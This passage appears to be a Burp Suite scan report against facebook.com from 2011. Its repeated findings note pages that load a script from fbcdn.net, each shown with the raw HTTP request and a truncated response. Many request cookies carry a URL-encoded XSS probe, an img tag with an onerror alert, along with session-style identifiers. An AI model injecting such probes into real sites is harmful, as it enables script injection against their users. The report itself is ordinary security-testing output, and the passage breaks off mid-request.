GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.23. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.24. http://www.facebook.com/DailyFinance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.25. http://www.facebook.com/HockeyKen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.26. http://www.facebook.com/KickIceForever

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.27. http://www.facebook.com/LadyBonesie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.28. http://www.facebook.com/Loizza

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.29. http://www.facebook.com/aim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.30. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.31. http://www.facebook.com/aol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.32. http://www.facebook.com/aolradio

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.33. http://www.facebook.com/burkerkink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.34. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.35. http://www.facebook.com/deedee.perez1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
